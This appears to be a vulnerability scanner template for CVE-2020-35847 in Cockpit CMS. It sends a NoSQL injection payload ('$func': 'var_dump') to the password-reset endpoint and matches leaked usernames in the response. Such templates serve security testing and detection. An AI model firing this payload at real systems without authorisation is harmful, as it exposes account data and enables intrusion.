39 lines
978 B
YAML
39 lines
978 B
YAML
id: CVE-2020-35847
|
|
|
|
info:
|
|
name: Cockpit prior to 0.12.0 NoSQL injection in /auth/resetpassword
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: |
|
|
Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
|
|
reference:
|
|
- https://swarm.ptsecurity.com/rce-cockpit-cms/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35847
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2020-35847
|
|
cwe-id: CWE-89
|
|
tags: cve,cve2020,nosqli,sqli,cockpit,injection
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/auth/requestreset"
|
|
headers:
|
|
Content-Type: application/json
|
|
body: |
|
|
{
|
|
"user": {
|
|
"$func": "var_dump"
|
|
}
|
|
}
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"'
|
|
|
|
# Enhanced by mp on 2022/04/04
|